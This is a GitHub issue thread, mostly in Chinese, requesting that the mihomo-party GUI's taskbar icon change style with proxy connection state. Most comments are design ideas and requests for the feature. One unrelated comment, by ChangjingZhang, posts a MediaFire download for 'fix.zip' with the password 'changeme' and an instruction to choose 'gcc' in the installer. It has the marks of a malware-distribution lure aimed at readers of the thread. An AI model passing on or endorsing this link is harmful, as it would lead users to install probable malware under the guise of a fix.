### ISSUE TITLE
[Feature] 任务栏图标能根据代理连接状态显示不同样式

### ISSUE THREAD

**Issue by lovelylion-jojo** [pompurin404/mihomo-party#90]
### Verify steps

- [X] 我已在标题简短的描述了我所需的功能
- [X] 我已在[Issue Tracker](./?q=is%3Aissue)中寻找过,但未找到我所需的功能
- [X] 这是向GUI程序提出的功能请求,而不是内核程序
- [X] 我未在最新的测试版本找到我所需的功能

### 操作系统

Windows

### 描述

任务栏图标能根据代理连接状态显示不同样式，这样可以方便快速的了解代理状态，而不用打开主页面或者右键任务栏图标弹出长长的菜单查看。

**Comment by ChangjingZhang** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ghost** [comment]
优先级不会很高，需要重新设计图标

**Comment by AlphaBot-Terminator** [comment]
> 优先级不会很高，需要重新设计图标

个人觉得可以直接把底色改成蓝色，而M的蓝色改成白色，黄色部分不变，这是一个非常明显的反差，有一种蓝猫改成白猫的效果。

**Comment by AlphaBot-Terminator** [comment]
我这边拥有同样的需求，企业级的客户会有VPN和burpsuite等软件的需求，不论是网络、安全、开发、渗透工程师，在工具栏中颜色的状态会让路由问题的排错提高效率。
换句话说，就是开着代理经常会出现代理混乱。。。

**Comment by karllee830** [comment]
> 优先级不会很高，需要重新设计图标

同样对这个功能有着很大的需求，希望作者能考虑优先做一下这个功能 :)

**Comment by Eureka0092** [comment]
同样很期待这个改进

**Comment by guanyangcun** [comment]
同样很期待这个改进

**Comment by localUsr** [comment]
同样很期待这个改进

**Comment by Jimmy20220531** [comment]
同样很期待这个改进

**Comment by wolo2603** [comment]
同样很期待这个改进

**Comment by freemagic9873** [comment]
同样很期待这个改进，谢谢

**Comment by seetimee** [comment]
同样很期待这个改进，谢谢

**Comment by BFlameSwift** [comment]
同样很期待这个改进，谢谢
